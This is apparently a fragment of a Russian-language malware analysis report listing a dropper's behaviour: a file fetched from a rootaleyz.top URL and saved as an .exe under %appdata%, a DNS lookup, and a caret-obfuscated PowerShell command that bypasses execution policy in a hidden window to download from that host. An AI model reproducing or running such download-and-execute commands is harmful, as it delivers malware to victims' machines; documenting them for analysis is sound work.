Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powE^r^shEll.^e^xE^ -Exec^u^TI^o^NPO^lICY By^PASS^ ^-NO^PR^O^fIlE -w^inD^oWstY^l^E^ hiDd^en ^(n^EW-OBJ^e^C^t ^sYs^tEM.^N^Et.weBcL^i^Ent^).D^oWNloAd^Fi^lE('http://rootaleyz.top/read...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "powE^r^shEll.^e^xE^ -Exec^u^TI^o^NPO^lICY By^PASS^ ^-NO^PR^O^fIlE -w^inD^oWstY^l^E^ hiDd^en ^(n^EW-OBJ^e^C^t ^sYs^tEM.^N^Et.weBcL^i^Ent^).D^oWNloAd^Fi^lE('http://rootaleyz.top/read...' (со скрытым окном)